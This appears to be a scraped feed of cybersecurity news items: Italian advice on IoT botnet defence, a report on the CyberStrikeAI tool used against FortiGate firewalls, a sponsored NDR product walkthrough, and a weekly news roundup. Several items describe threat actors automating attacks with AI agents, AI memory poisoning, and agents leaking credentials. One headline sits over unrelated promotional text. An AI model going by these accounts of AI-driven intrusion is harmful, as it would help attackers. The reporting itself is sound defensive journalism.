d’azione in caso di compromissione. Threat intelligence e monitoraggio continuo. Iscriversi ai feed di threat intelligence rilevanti per il proprio settore produttivo e monitorate gli indirizzi IP pubblici delle infrastrutture aziendali su database come Shadowserver per verificare se risultano associati a botnet note. Implementare un SIEM con regole specifiche per rilevare comportamenti tipici dei bot (scansioni di porte, tentativi di connessione C2, picchi anomali di traffico UDP/ICMP). Piano di risposta agli incidenti aggiornato. Includere esplicitamente gli scenari DDoS e la compromissione IoT nel proprio Incident Response Plan. Definire in anticipo chi contattare (ISP, provider di mitigazione DDoS, CERT nazionale), quali sistemi isolare in via prioritaria e come comunicare con clienti e stakeholder durante un’interruzione prolungata. Valutazione dei fornitori IoT. Nei processi di procurement, introdurre criteri di cyber security by design: verificare che i produttori abbiano politiche di patch management chiare, tempi di supporto documentati e un processo di vulnerability disclosure. Preferire vendor che aderiscano a standard come ETSI EN 303 645 o le linee guida NIST per l’IoT. Dal punto di vista della gestione del rischio aziendale, questa vicenda ribadisce una verità scomoda e cioè che il rischio IoT non è un rischio tecnico di nicchia, è un rischio di business. Un’azienda che subisce un attacco DDoS da 30 Tbps, anche qualora dovesse disporre di un contratto con un provider di mitigazione, andrà di sicuro incontro a interruzione del servizio, danni reputazionali, possibili violazioni degli SLA con i clienti e, in alcuni settori regolamentati, obblighi di notifica alle autorità di vigilanza. Dunque, i danni indiretti spesso superano di gran lunga i costi diretti della remediation. È dunque opportuno valutare l’adozione di questi tre elementi a supporto delle organizzazioni: Assicurazione cyber: verificare che la propria polizza copra esplicitamente gli attacchi DDoS e le perdite da interruzione del servizio. Molte polizze “cyber” contengono esclusioni che emergono solo al momento del sinistro. Business Continuity Planning: testare il piano di continuità operativa almeno una volta l’anno con simulazioni realistiche che includano scenari di attacco DDoS prolungato. La gestione di crisi non si improvvisa sotto pressione. Supply chain security: se i fornitori o partner hanno dispositivi IoT compromessi nelle loro reti, il rischio può propagarsi verso di noi attraverso connessioni VPN, API o integrazioni di sistema. Estendete le vostre valutazioni di rischio all’ecosistema di terze parti. Lo smantellamento delle quattro botnet Aisuru, KimWolf, JackSkid e Mossad è un risultato straordinario, reso possibile dalla combinazione di capacità investigative internazionali e cooperazione pubblico-privato a un livello raramente raggiunto in precedenza. Ma sarebbe un errore interpretarlo come un punto di arrivo. I dispositivi vulnerabili che hanno alimentato queste botnet esistono ancora, a miliardi, connessi a Internet in tutto il mondo e, purtroppo, le tecniche di infezione sono documentate e replicabili con il modello di business criminale del DDoS-as-a-Service che si è dimostrato redditizio: dunque, possiamo ben prevedere che nuove botnet emergeranno o probabilmente già esistono, in fase di crescita silenziosa. La risposta strutturale richiede interventi su più livelli: regolamentazione più stringente sulla sicurezza dei prodotti IoT (l’EU Cyber Resilience Act va nella direzione giusta, ma i tempi di implementazione sono lunghi), responsabilizzazione dei produttori, educazione degli utenti finali e investimenti continuativi in capacity di threat intelligence e law enforcement specializzato. Nel frattempo, la prima linea di difesa siamo noi, aziende e privati che dobbiamo smettere di trattare i dispositivi connessi come gadget e iniziare a trattarli per quello che sono ossia endpoint di sicurezza che richiedono attenzione, aggiornamenti e configurazione consapevole. Il router del salotto (e, di conseguenza, anche quello aziendale) non è più solo un oggetto di consumo, ma un potenziale vettore di attacchi che possono colpire ospedali, infrastrutture critiche e sistemi di difesa. Vale la pena prendersene cura.
cybersecurity360.itMar 23, 2026extracted
CyberStrikeAI tool adopted by hackers for AI-powered attacks
Researchers warn that a newly identified open-source AI security testing platform called CyberStrikeAI was used by the same threat actor behind a recent campaign that breached hundreds of Fortinet FortiGate firewalls. Last month, BleepingComputer reported on an AI-assisted hacking operation that compromised more than 500 FortiGate devices in five weeks. The threat actor behind this campaign used multiple servers, including a web server at 212.11.64[.]250. In a new report, Senior Threat Intel Advisor for Team Cymru, Will Thomas (aka BushidoToken), says that the same IP address was observed running the relatively new CyberStrikeAI AI-powered security testing platform. Analyzing NetFlow data, Team Cymru identified a "CyberStrikeAI" service banner running on port 8080 on 212.11.64[.]250 and saw network communications between that IP and Fortinet FortiGate devices the threat actor targeted. The FortiGate campaign infrastructure was last seen running CyberStrikeAI on January 30, 2026. CyberStrikeAI's GitHub repository describes itself as an "AI-native security testing platform built in Go" that integrates over 100 security tools, an intelligent orchestration engine, predefined security roles, and a skills system. "Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams," reads the project description. The tool includes an AI decision engine compatible with models such as GPT, Claude, and DeepSeek, a password-protected web UI with audit logging and SQLite persistence, and a dashboard for vulnerability management, task orchestration, and attack-chain visualization. Its tooling allows it to conduct a full attack chain, including network scanning (nmap, masscan), web and application testing (sqlmap, nikto, gobuster), exploitation frameworks (metasploit, pwntools), password cracking tools (hashcat, john), and post-exploitation frameworks (mimikatz, bloodhound, impacket). By combining these tools with AI agents and an orchestrator, CyberStrikeAI enables operators, even low-skilled ones, to automate attacks against targets. Team Cymru warns that AI-native orchestration engines like this could accelerate automated targeting of exposed edge devices, including firewalls and VPN appliances. The researchers say they observed 21 unique IP addresses running CyberStrikeAI between January 20 and February 26, 2026, with servers primarily hosted in China, Singapore, and Hong Kong. Additional infrastructure was spotted in the United States, Japan, and Europe. "As adversaries increasingly embrace AI-native orchestration engines, we expect to see a rise in automated, AI-driven targeting of vulnerable edge devices, similar to the observed reconnaissance and targeting of Fortinet FortiGate appliances," explains Thomas. "In the near future, defenders must be prepared for an environment where tools like CyberStrikeAI, alongside the developer's other AI-assisted privilege escalation projects like PrivHunterAI and InfiltrateX, significantly lower the barrier to entry for complex network exploitation." The researchers also examined the profile of the CyberStrikeAI developer, who goes by the alias "Ed1s0nZ." Based on public repositories linked to the account, the developer has worked on additional AI-assisted security tools, including PrivHunterAI, which uses AI models to detect privilege escalation vulnerabilities, and InfiltrateX, a privilege escalation scanning tool. According to Team Cymru, the developer's GitHub activity shows interactions with organizations previously linked to Chinese government–affiliated cyber operations. In December 2025, the developer shared CyberStrikeAI with Knownsec 404's "Starlink Project." Knownsec is a Chinese cybersecurity firm with alleged links to the Chinese government. On January 5, 2026, the developer mentioned receiving a "CNNVD 2024 Vulnerability Reward Program – Level 2 Contribution Award" on their GitHub profile. The China National Vulnerability Database (CNNVD) is believed to be operated by China's intelligence community, which allegedly uses it to identify vulnerabilities for its operations. Team Cymru says the reference to CNNVD was later removed from the developer's profile. The developer's GitHub repositories are primarily written in Chinese, suggesting they are a Chinese-speaking developer, and interaction with domestic cybersecurity organizations would not necessarily be unusual. These new AI-powered cybersecurity tools continue to demonstrate how commercial AI services are increasingly used by threat actors to automate their attacks while, at the same time, lowering the barrier to entry. Last month, Google also reported that threat actors are abusing Gemini AI across all stages of cyberattacks, empowering the abilities of threat actors of all skill levels. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMar 3, 2026extracted
My Day Getting My Hands Dirty with an NDR System
My objective As someone relatively inexperienced with network threat hunting, I wanted to get some hands-on experience using a network detection and response (NDR) system. My goal was to understand how NDR is used in hunting and incident response, and how it fits into the daily workflow of a Security Operations Center (SOC). Corelight’s Investigator software, part of its Open NDR Platform, is designed to be user-friendly (even for junior analysts) so I thought it would be a good fit for me. I was given access to a production version of Investigator that had been loaded with pre-recorded network traffic. This is a common way to learn how to use this type of software. While I’m new to threat hunting, I do have experience looking at network traffic flows. I was even an early user of one of the first network traffic analyzers called Sniffer. Sniffers were specialized PCs equipped with network adapters designed to capture traffic and packets. These computers were the foundation on which more advanced network monitoring platforms were built. Back in the mid-1980s, these tools were expensive and required a lot of training. Interpreting the terse, cryptic data they produced was challenging, and knowing how to translate those insights into actionable next steps took patience and expertise. Now, almost forty years later, I wanted to see how security teams are conducting everyday network hunting when complex, fast attacks are the norm—and how quickly I could pick up the new tools. The role of NDR in SOC workflows Before I jump into my experience, let me explain how NDR integrates with the SOC. NDR systems are most frequently used by mid- to elite-level security operations. In these environments, NDR is a key part of incident response and threat hunting workflows. The systems provide deep visibility across networks while also detecting intrusions and anomalies. This visibility is important not just for spotting more complex attacks, but also for uncovering misconfigurations or vulnerabilities that can lead to breaches or outages. NDR helps analysts triage events and can provide direction and related insights to determine the right response. Integrating NDR with the SOC’s Security Information and Event Managers (SIEMs), endpoint detection and response (EDR) solutions, and firewalls enables analysts to gather, enrich, and correlate network data with widespread events. Together, these integrations let analysts respond faster and more efficiently by connecting network insights with alerts and actions from other tools, especially when finding more advanced attacks that can evade EDR, for example. Knowing NDR is a central component of the SOC, I was eager to see how the workflows functioned. Starting up the NDR system When you first open Investigator, you’re greeted by a dashboard that displays a ranked list of the latest highest risk detections, listed by IP address and their frequency of occurrence. Most investigations start because some suspicious activity on the network triggered an alert. This prompts an analyst to form a hypothesis about why the event appeared on the dashboard, then drill down into the alert’s details to validate or disprove the idea. Clicking through the list, I could see robust details about the specific issues that were flagged. In my case, I was looking at evidence of a couple of exploit tools in use (including an old favorite of mine, NMAP). These were also using reverse command shells to execute malware, a dodgy DNS server, and a series of packets that documented a conversation between a suspicious pair of IP addresses. I saw right away how Investigator’s added context is important. Rather than having to figure out network traffic patterns and their meaning, Investigator’s dashboard explained this for me and added even more context; each listing also showed which techniques from the MITRE ATT&CK® framework were involved, helping me understand the broader significance of the event. This level of detail is a great way to educate yourself about unfamiliar exploits, because you can quickly drill down into the specifics of each alert to gain deeper insights into the contents of the network packets involved. This was also my chance to explore the GenAI features built into the tool. I could ask some pre-set questions, such as “ What type of attack is associated with this alert?” It would respond with a recommended course of action in step-by-step detail. For example, it advised me to search particular logs for telltale signs that a node was communicating with an external command-and-control server and to check if it had sent a particular malware payload. It explained how to see if the threat was moving laterally to some other part of the network. It may sound complicated, but my explanation actually takes longer than it did to click around and get these details when I was inside the product. This investigative process is fundamental for any SOC analyst who must piece together fragments of information to form a coherent picture of what the adversary is doing. In this case, the GenAI was surfacing insights and actionable next steps, clarifying the investigation process and allowing me to focus on my analysis. How AI complements the human response Integrated AI is certainly not unique in today’s collection of security products, but this was a helpful feature. What I liked about the AI hints was that they were truly useful, and not annoying, as some of the consumer-grade chatbots can be. There are clear workflow steps, such as: • Figure out the exploit timeline and use your various log files to correlate connected IP addresses • Figure out the DNS origins • Suss out HTTP requests and file transfers, and so forth. These bulleted items were not just some dry features mentioned in marketing materials but actual elements of my threat hunting. Certainly, I knew—at least from afar—about why these were important and how these various pieces fit together from my previous experience using network analyzers. But having these workflows spelled out by the AI brought my own thoughts into focus and helped me build and explain the narrative of an attack. I saw how these AI-based suggestions could enable a human analyst to determine how to more quickly respond to the incident and begin mitigating its impact. For example, when seeing a file transfer, you can figure out the file’s destination as well as whether it contains malware or other suspicious content. Also, the generated hints and explanations are located in just the right place on-screen so as to be a natural fit into an analyst’s workflow. Given the number of ways malware can enter a network, it is nice to have these tips and hints that can upskill analysts and serve as timely reminders on how to sift through various alerts. Again, the AI tool helps me understand the details associated with each alert, such as why it occurred, where it came from, and the potential damage it caused. Finally, Corelight makes pains to state that Investigator “only shares data with the model when an analyst is investigating a threat, and we do not use customer data for training the AI model.” To that end, there are two distinct integrations: one for private data (like IP addresses and customer details) and one for public data (that doesn’t reveal anything specific about the underlying network traffic), which can be operated independently. To enable both of these integrations, you just go to the Settings page and simply turn them on. What else did I try out? Investigator comes with dozens of specialized dashboards that enable deeper analysis. For example, three dashboards are related to anomaly detection: one provides an overall summary, another offers detailed information, and a third displays the first time something has been observed on the network. This last display is particularly useful because it could show analysts novel techniques: signs of a new anomaly, for example. With this level of granularity, analysts have the data they need to determine whether an event is truly malicious, simply the result of a software misconfiguration, or just an unusual but harmless occurrence. Another complementary approach I checked out was the Investigator’s built-in command line panel, where I could search for specific conditions. A good way to learn more about the syntax and use for this portion of the product can be found in Corelight’s Threat Hunting Guide, where you can cut and paste the sample command strings directly into your Investigator searches, and copy their syntax for your own purposes. This can help analysts become more familiar with the data so they can use it to threat hunt unknown attacks in the future. What could I see with NDR that I wouldn’t otherwise? An NDR platform provides two important benefits: enrichment and integration. Each network connection is enriched with data collected by the Investigator. This can include not just which IP address triggered an alert, but how the activity compares to your normal network baseline activity. Analyzing traffic from normal baseline periods is invaluable because it lets you quickly spot the difference between, say, everyday access to a SQL server and unusual activity flagged by the system. When something seems off, all the context you need is right at your fingertips. You don’t, for example, need to recall that port 123 is used for the Network Time Protocol, nor what kinds of exploits can happen if someone is messing with it. Enrichment also helps to correlate a particular event with other related data points that explain what you’re seeing. This gets to its other benefit: integration with other security tools. Integrations are how the enriched metadata is collected and shared. For example, log files can be exported to a number of SIEMs for further correlation analysis. NDR insights can be combined with EDR tools like CrowdStrike Falcon® to block a particular server or host, or to block a particular IP address in combination with a firewall like Palo Alto Networks. Threat intelligence rules used in technologies such as Suricata® and Yara, and other indicators of compromise, can be added for further defense. These integrations allow you to combine NDR’s network visibility with EDR, making it possible to identify which endpoints or hosts may be the source of suspicious activity or could be compromised by a bad actor. It’s particularly advantageous when tracking malware. Today, it’s common to see malware that moves across multiple threat domains (such as this recent exploit that used a burner email account, a compromised South African router, a phishing-as-a-service package, and infrastructure that connected machines in Russia, the US, and Croatia). Having this level of network visibility is crucial to understanding these complex relationships and threat movements. More than 50 such integrations are possible using Corelight’s solution, so it can be used as a way to add information from many different detection sources, and these results can be exported to many products that offer resolution. Having a repository of common vulnerability details like these can be a ready reference for a SOC analyst who might have already seen that particular vulnerability or who is learning about new exploits. Adding these integrations is straightforward, too. For example, you can block traffic from specific IP addresses by adding them to Palo Alto’s External Dynamic Lists and simply exchanging cryptographic keys. Am I ready to be a network security analyst now? Not quite. While I like and want to stick with my day job (writing about security and testing new products), this experience brought me more in touch with what the day-to-day SOC analyst does for a living. By using Investigator, I was able to take my basic skills and network protocol knowledge and extend them into actionable tasks. It was also helpful in helping me learn about the inner operations of the various exploits that it found moving across my sample network. Think of Investigator as a force multiplier for your SOC’s middle-level staff, saving them time and providing more resources to figure out threats and mitigations. This examination of the inner workings comes from being able to tie together an alert with other parts of the network -- a custom DNS provider, a web host that shouldn’t be sending data somewhere, or an open cloud data store -- that could lead towards the key to unwinding a particular exploit. Without an NDR platform to collect and correlate all this information, I would be mostly scrambling to find the separate bits and pieces of data, or manually cutting and pasting data from one security program to another. This way, I had the entire data corpus at my fingertips, complete with the connection relationships and activity that the software automatically surfaces. I didn’t have to fumble around with the cut and paste of an IP address or a search string: instead, I just clicked on the particular element, and the software showed me the particular relationship. Yes, things have changed since those early days of the Sniffer. But my day getting down and dirty with Corelight’s Investigator taught me valuable lessons on how to create threat hypotheses, understand how threats move about a network, and, more importantly, gave me an opportunity to learn more about how networks operate and how they can be defended in the modern era. To learn more about Corelight’s open NDR platform, visit corelight.com. If you are curious to learn more about how elite SOC teams use Corelight’s open NDR platform to detect novel attack types, including those leveraging AI techniques, visit corelight.com/elitedefense. Note: This article was thoughtfully written and contributed for our audience by David Strom.
thehackernews.comFeb 17, 2026extracted
Week in review: Exploited newly patched BeyondTrust RCE, United Airlines CISO on building resilience
Week in review: Exploited newly patched BeyondTrust RCE, United Airlines CISO on building resilience Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: United Airlines CISO on building resilience when disruption is inevitable In this Help Net Security interview, Deneen DeFiore, VP and CISO at United Airlines, explains how the company approaches modernization without compromising safety-critical environments, why resilience and continuity matter as much as prevention, and how the airline manages risk across an interconnected ecosystem of vendors, partners, and infrastructure providers. What happens when cybersecurity knowledge walks out the door In this Help Net Security interview, Andrew Northern, Principal Security Researcher at Censys, explains why mentorship matters and what organizations risk losing when senior staff disengage. He argues that institutional memory and judgment under pressure are difficult to rebuild once they disappear. Groupe Rocher CISO on strengthening a modern retail cybersecurity strategy In this Help Net Security interview, Jérôme Etienne, Group CISO, Groupe Rocher shares practical insights on closing strategy gaps, managing third-party risk, and securing online and in-store environments. In the conversation, he also discusses why point-of-sale and in-store systems can no longer be treated as secondary security concerns, especially as attackers increasingly target overlooked technologies. OpenClaw Scanner: Open-source tool detects autonomous AI agents A new free, open source tool is available to help organizations detect where autonomous AI agents are operating across corporate environments. The OpenClaw Scanner identifies instances of OpenClaw, an autonomous AI assistant also known as MoltBot, that can execute tasks, access local files, and authenticate to internal systems without centralized oversight. When security decisions come too late, and attackers know it In this Help Net Security, Chris O’Ferrell, CEO at CodeHunter, talks about why malware keeps succeeding, where attackers insert malicious code in the SDLC, and how CI/CD pipelines can become a quiet entry point. He also breaks down the difference between behavioral detection and behavioral intent analysis, and why explainable results matter for security teams. Edge computing’s biggest lie: “We’ll patch it later” In this Help Net Security interview, Piotr Buliński, CTO of Qbee, digs into the edge equivalent of “snowflake servers,” why cloud habits break in the field, and what it takes to monitor and update fleets safely. BeyondTrust fixes easy-to-exploit pre-auth RCE vulnerability in remote access tools (CVE-2026-1731) BeyondTrust fixed a critical remote code execution vulnerability (CVE-2026-1731) in its Remote Support (RS) and Privileged Remote Access (PRA) solutions and is urging self-hosted customers to apply the patch as soon a possible. Unlike the Remote Support zero-day (CVE-2024-12356) that was flagged after having been exploited by China-nexus threat actors to breach the US Treasury Department in late 2024, this newest vulnerability was discovered and privately disclosed by a security researcher. European Commission hit by cyberattackers targeting mobile management platform The European Commission’s mobile device management platform was hacked but the incident was swiftly contained and no compromise of mobile devices was detected, EU’s executive branch announced on Friday. The intrusion was detected on January 30, 2026, by CERT-EU, the cybersecurity team protecting all European Union institutions, bodies, and agencies. Ransomware group breached SmarterTools via flaw in its SmarterMail deployment SmarterTools, the company behind the popular Microsoft Exchange alternative SmarterMail, has been breached by a ransomware-wielding group that leveraged a recently fixed vulnerability in that solution. Unpatched SolarWinds WHD instances under active attack Internet‑exposed and vulnerable SolarWinds Web Help Desk (WHD) instances are under attack by threat actors looking to gain an initial foothold into target organizations’ networks, Microsoft and Huntress researchers have warned. Singapore telcos breached in China-linked cyber espionage campaign Singapore’s four major telecommunications companies were hit by a coordinated cyber espionage campaign last year, the country’s Cyber Security Agency (CSA) has revealed. An advanced persistent threat group known as UNC3886 has probed deep into the networks of M1, SIMBA Telecom, Singtel, and StarHub, spurring Singapore’s security agencies to mount a large cyber defence operation. Microsoft Patch Tuesday: 6 exploited zero-days fixed in February 2026 Microsoft has plugged 50+ security holes on February 2026 Patch Tuesday, including six zero-day vulnerabilities exploited by attackers in the wild. Among the zero-days fixed are three vulnerabilities that allow attackers to bypass a security feature. Ivanti EPMM exploitation: Researchers warn of “sleeper” webshells A massive wave of exploitation attempts has followed the disclosure of CVE-2026-1281, a critical pre-authentication Ivanti EPMM vulnerability, the Shadowserver Foundation has warned. Some of it is automated scanning for vulnerable systems, but according to Greynoise and Defused, a suspected initial access broker has been prepping unpatched instances with a “sleeper” webshell for follow-on exploitation by other threat actors. Apple fixes zero-day flaw exploited in targeted attacks (CVE-2026-20700) Apple has released fixes for a zero-day vulnerability (CVE-2026-20700) exploited in targeted attacks last year. CVE-2026-20700 is a memory corruption issue in dyld, the Dynamic Link Editor component of Apple’s operating systems, and may allow attackers with memory write capability to execute arbitrary code. Windows Notepad Markdown feature opens door to RCE (CVE-2026-20841) Among the many security fixes released by Microsoft on February 2026 Patch Tuesday is one for CVE-2026-20841, a command injection vulnerability in Notepad that could be exploited by attackers to achieve remote code execution on targets’ Windows system. Hackers probe, exploit newly patched BeyondTrust RCE flaw (CVE-2026-1731) Attackers are exploiting a recently patched critical vulnerability (CVE-2026-1731) in internet-facing BeyondTrust Remote Support and Privileged Remote Access instances. How AI is reshaping attack path analysis Attackers increasingly leverage AI to rapidly identify weaknesses and chain exploits, forcing defenders to keep pace by using AI to identify and stop those same weaknesses. However, security teams often struggle to determine what matters most, how it could realistically be exploited, and what to fix first. Brutus: Open-source credential testing tool for offensive security Brutus is an open-source, multi-protocol credential testing tool written in pure Go. Designed to replace legacy tools that have long frustrated penetration testers with dependency headaches and integration gaps, Brutus ships as a single binary with zero external dependencies and native support for the JSON-based reconnaissance pipelines that define offensive security. AI-driven scams are eroding trust in calls, messages, and meetings In this Help Net Security video, Miguel Fornés, Governance and Compliance Manager at Surfshark, discusses how AI is changing social engineering attacks. He describes how tasks that once took weeks, such as research and targeting, are now automated and cheap. This shift has lowered the skills and cost needed to run scams and phishing campaigns. Attackers use AI agents to gather open source data and hold live conversations with victims without human help. Allama: Open-source AI security automation Allama is an open-source security automation platform that lets teams build visual workflows for threat detection and response. It includes integrations with 80+ types of tools and services typical in security operations, including SIEM systems, endpoint detection and response products, identity providers, and ticketing systems. TikTok under EU pressure to change its addictive algorithm The European Commission has issued preliminary findings that say TikTok breaches the Digital Services Act due to its addictive design. The Commission opened a formal investigation into TikTok in February 2024. The probe examined whether the platform meets its obligations as a very large online platform under the Digital Services Act. These obligations include identifying risks linked to the service and taking steps to reduce them. EU targets Meta over WhatsApp AI access restrictions The European Commission believes Meta breached EU competition rules by blocking other AI assistants from accessing and interacting with users on WhatsApp. Face scans and ID checks are coming to Discord Discord users will soon see a change to how their accounts work. From early March 2026, access to some features will require age verification using an ID or a face scan. The changes follow earlier deployments in a small number of countries and will apply to both new and existing accounts. DuckDuckGo enables AI voice chat without saving voice data DuckDuckGo has added voice chat to Duck.ai, allowing users to speak to an AI assistant while keeping audio private, unrecorded, and excluded from AI training. Voice chat is available in the DuckDuckGo browser and most third-party browsers, with support for Mozilla listed as coming soon. Trojanized 7-Zip downloads turn home computers into proxy nodes A trojanized version of the popular 7-Zip software is quietly turning home computers into residential proxy nodes, Malwarebytes warns. Spurred by a Reddit post in which a user complained about getting infected with malware after downloading 7-Zip from 7zip[.]com instead of the legitimate 7-zip.org, Malwarebytes researchers looked into the matter and found that the malicious installer functions as 7-zip, but also silently drops additional payloads onto the system. Microsoft tightens Windows security with app transparency and user consent Microsoft is strengthening default protections in Windows through two security initiatives, Windows Baseline Security Mode and User Transparency and Consent. User Transparency and Consent introduces a structured approach to how Windows presents security decisions to users. The operating system will prompt users when applications request access to sensitive resources such as files, cameras, or microphones, and when installers attempt to add additional software. That “summarize with AI” button might be manipulating you Microsoft security researchers discovered a growing trend of AI memory poisoning attacks used for promotional purposes, referred to as AI Recommendation Poisoning. Picking an AI red teaming vendor is getting harder Vendor noise is already a problem in traditional security testing. AI red teaming has added another layer of confusion, with providers offering everything from consulting engagements to automated testing platforms. Many buyers still struggle to tell whether a vendor can test real-world AI system behavior or only run a packaged set of jailbreak prompts. OpenVPN releases version 2.7.0 with expanded protocol and platform updates OpenVPN version 2.7.0 is now available. The update advances support for multi-address server configurations and updates client functionality across operating systems. The release includes enhancements in data channel handling and support for evolving kernel and cryptographic components. 1Password open sources a benchmark to stop AI agents from leaking credentials Research has shown that some AI models can identify phishing websites with near-perfect accuracy when asked. When those same models are used as autonomous agents with access to tools like email, web browsers, and password vaults, they can still carry out the scam. That gap is the focus of a new open source benchmark from 1Password called the Security Comprehension and Awareness Measure, or SCAM. Police arrests distributor of JokerOTP password-stealing bot The Dutch National Police arrested a 21-year-old man from Dordrecht as part of a cybercrime investigation by Team Cybercrime Oost-Brabant. The suspect is believed to have distributed a tool known as JokerOTP, a bot used to intercept one-time passwords (OTPs) used to secure online accounts and financial transactions. Bitcoin trading firm CEO gets 20 years for operating $200 million Ponzi scheme The U.S. Department of Justice sentenced the CEO of a multi level marketing and bitcoin trading firm to 20 years in prison after a conviction for wire fraud and money laundering tied to a large scale Ponzi scheme. AI agents behave like users, but don’t follow the same rules Security and governance approaches to autonomous AI agents rely on static credentials, inconsistent controls, and limited visibility. Securing these agents requires the same rigor and traceability applied to human users, according to Cloud Security Alliance’s Securing Autonomous AI Agents report. OpenAI updates Europe privacy policy, adding new data categories OpenAI has updated its Europe-facing privacy policy following the November 2024 EU revision, clarifying scope, expanding coverage, and detailing user controls. The updated document is longer, with dedicated sections for data controls and practical resources. It explains key controls and settings within the text, making available choices easier to understand without moving between documents. Linux kernel 6.19 reaches stable release, kernel 7.0 work is already underway Development activity on the Linux kernel continues into early 2026 with the stable release of version 6.19. Kernel maintainers have completed the pre-release cycle and merged the final set of changes into the mainline tree. The release follows the ongoing weekly rhythm of code submission and testing that supports Linux’s widespread use across servers, desktops, and embedded systems. Security teams are paying for sprawl in more ways than one Most enterprises run security programs across sprawling environments that include mobile devices, SaaS applications, cloud infrastructure, and telecom networks. Spend control in these areas often sits outside the security organization, even when the operational consequences land directly on security teams. Tangoe’s 2026 Trends & Savings Recommendations Report connects these cost domains to recurring governance failures that create risk exposure across identity, endpoint management, and infrastructure visibility. Product showcase: PCAPdroid analyzes Android app network activity PCAPdroid is a free, open-source Android app that allows inspection of network traffic. Installation is straightforward and does not require creating an account. To begin capturing traffic, a VPN request must be accepted, which allows the app to monitor network activity. Once permission is granted, tapping the play button starts PCAPdroid, which then runs in the background until stopped. Zen-AI-Pentest: Open-source AI-powered penetration testing framework Zen-AI-Pentest provides an open-source framework for scanning and exercising systems using a combination of autonomous agents and standard security utilities. The project aims to let users run an orchestrated sequence of reconnaissance, vulnerability scanning, exploitation, and reporting using AI guidance and industry tools like Nmap and Metasploit. It is written to support command line, API, and web interfaces. Yubico previews passkey-enabled digital signatures in upcoming YubiKey 5.8 firmware Yubico’s upcoming YubiKey 5.8 firmware introduces standardized APIs that integrate hardware-backed signatures with passkey authentication. To enable privacy-capable digital signatures using passkeys, expanded enterprise IdP support, and next-generation digital wallet use cases, the firmware adds support for FIDO CTAP 2.3 and preview WebAuthn signing extensions. Google Search introduces new ways to remove sensitive personal information and explicit images Google expanded its “Results about you” tool to give users more control over sensitive personal information and added a way to request removal of non-consensual explicit images from Search. Microsoft begins Secure Boot certificate update for Windows devices Microsoft has begun updating Secure Boot certificates originally issued in 2011 to ensure that Windows devices continue to verify boot software as older certificates reach the end of their lifecycle and begin expiring in June 2026. Java security work is becoming a daily operational burden Security teams in large enterprises already spend significant time tracking vulnerabilities across software supply chains, third-party libraries, and internal codebases. Java environments add another layer of exposure because so many mission-critical systems still run on the JVM. Cloud teams are hitting maturity walls in governance, security, and AI use Enterprise cloud programs have reached a point where most foundational services are already in place, and the daily work now centers on governance, security enforcement, and managing sprawl across environments. Hybrid and multi-cloud architectures have become routine in large organizations, bringing new operational pressures around consistency and control. Microsoft Store updated with a new CLI, analytics, and Web Installer improvements Microsoft has introduced new developer tools, updates to developer analytics, and a Web Installer in the Microsoft Store on Windows to help developers build and scale apps on the platform. Attackers are moving at machine speed, defenders are still in meetings Threat actors are using AI across the attack lifecycle, increasing speed, scale, and adaptability, according to the 2026 State of Cybersecurity report by Ivanti. The study compares perceived threat levels across common attack types with organizational readiness to respond and identifies persistent gaps between awareness and execution across security programs. Cyber risk is becoming a hold-period problem for private equity firms Private equity firms have spent years treating cybersecurity as an IT hygiene issue inside portfolio companies. That approach is getting harder to sustain as ransomware, data theft, and regulatory pressure interfere with value creation during the hold period. Ubuntu 24.04.4 LTS arrives with cumulative security and bug fixes Security teams running Ubuntu in production often delay major OS upgrades until the next point release arrives with accumulated patches and newer hardware support. Ubuntu 24.04.4 LTS is now available as refreshed installation media for Noble Numbat, bundling the latest updates and offering a current hardware enablement stack for new deployments. Why secure OT protocols still struggle to catch on Industrial control system networks continue to run on legacy communication protocols that were built for reliability and uptime, not authentication or data integrity. In many environments, malicious actors with access to the OT network can impersonate devices, issue unauthenticated commands, or modify messages in transit without detection. OpenAI released GPT-5.3-Codex-Spark, a real-time coding model OpenAI has released a research preview of GPT-5.3-Codex-Spark, an ultra-fast model for real-time coding in Codex. It is available to ChatGPT Pro users in the latest versions of the Codex app, the command-line interface, and the VS Code extension. Cybersecurity jobs available right now: February 10, 2026 We’ve scoured the market to bring you a selection of roles that span various skill levels within the cybersecurity field. Check out this weekly selection of cybersecurity jobs available right now. New infosec products of the week: February 13, 2026 Here’s a look at the most interesting products from the past week, featuring releases from Armis, Black Duck, Portnox, and SpecterOps.
helpnetsecurity.comFeb 15, 2026extracted
Port-scanning nel 2025: Nmap e AI — come integrarli in modo sicuro e operativo
Betti RHC, la prima graphic novel al mondo dedicata alla cybersecurity awareness, ha finalmente il suo sito ufficiale. Uno spazio tutto suo dove scoprire il progetto, sfogliare le copertine degli episodi e immergersi nel mondo di Betti: la giovane laureanda in informatica che, dopo la morte misteriosa del padre, si trasforma nell'hacker più potente del mondo. Una storia avvincente che, episodio dopo episodio, affronta una minaccia digitale diversa — dal phishing al ransomware, fino al cyberbullismo — e insegna a riconoscerla e a difendersi, senza che sembri mai una lezione. Sul sito trovate tutto ciò che rende Betti un progetto diverso dal solito: la sua filosofia, le anteprime delle tavole e il racconto di come nasce ogni volume. Perché dietro Betti RHC c'è solo lavoro umano: ogni tavola è disegnata interamente a mano dagli artisti del Gruppo Arte di Red Hot Cyber, senza alcun uso di intelligenza artificiale. E a garantire che ogni storia sia realistica e tecnicamente corretta c'è la supervisione degli hacker etici del gruppo HackerHood, che mantengono il racconto fedele al mondo reale della sicurezza informatica. C'è spazio anche per le aziende, che possono usare Betti come strumento di awareness diverso dai soliti corsi: acquistare i volumi, personalizzarli con il proprio brand o sponsorizzare nuovi episodi. E come primo regalo, l'episodio "Byte the Silence", dedicato al cyberbullismo, è scaricabile gratuitamente per uso personale. Perché la miglior difesa, in fondo, è una bella storia. 👉 Scopri tutto su https://betti.redhotcyber.com/
redhotcyber.comNov 1, 2025extracted
The role of Artificial Intelligence in today’s cybersecurity landscape
